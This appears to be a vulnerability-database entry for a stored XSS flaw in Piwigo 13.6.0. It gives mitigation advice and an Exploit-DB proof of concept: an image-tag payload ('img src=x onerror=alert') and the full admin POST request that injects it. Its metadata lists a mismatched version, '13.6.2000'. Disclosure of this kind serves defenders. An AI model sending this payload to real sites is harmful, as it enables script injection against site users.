Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)

vendor:

Piwigo

by:

Mirabbas Agalarov

5.5

CVSS

MEDIUM

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Piwigo

Affected Version From: 13.6.2000

Affected Version To: 13.6.2000

Patch Exists: NO

Related CWE:

CPE: a:piwigo:piwigo:13.6.0

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

Piwigo 13.6.0 – Stored Cross-Site Scripting (XSS)

This vulnerability allows an attacker to inject malicious scripts into the Piwigo application, potentially leading to unauthorized actions or data theft. By uploading an image and modifying the tag during editing, an attacker can execute arbitrary JavaScript code. The payload used in this case is '<img%20src=x%20onerror=alert(4)>'.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate image tags before displaying them. Implementing proper input validation and output encoding can prevent the execution of malicious scripts.

Source

Exploit-DB raw data:

Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Application: Piwigo
Version: 13.6.0 
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://piwigo.org/
Software Link: https://piwigo.org/get-piwigo
Date of found: 18.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)
payload: <img%20src=x%20onerror=alert(4)>


POST /piwigo/admin.php?page=photo-9 HTTP/1.1
Host: localhost
Content-Length: 159
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/piwigo/admin.php?page=photo-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
Connection: close

name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings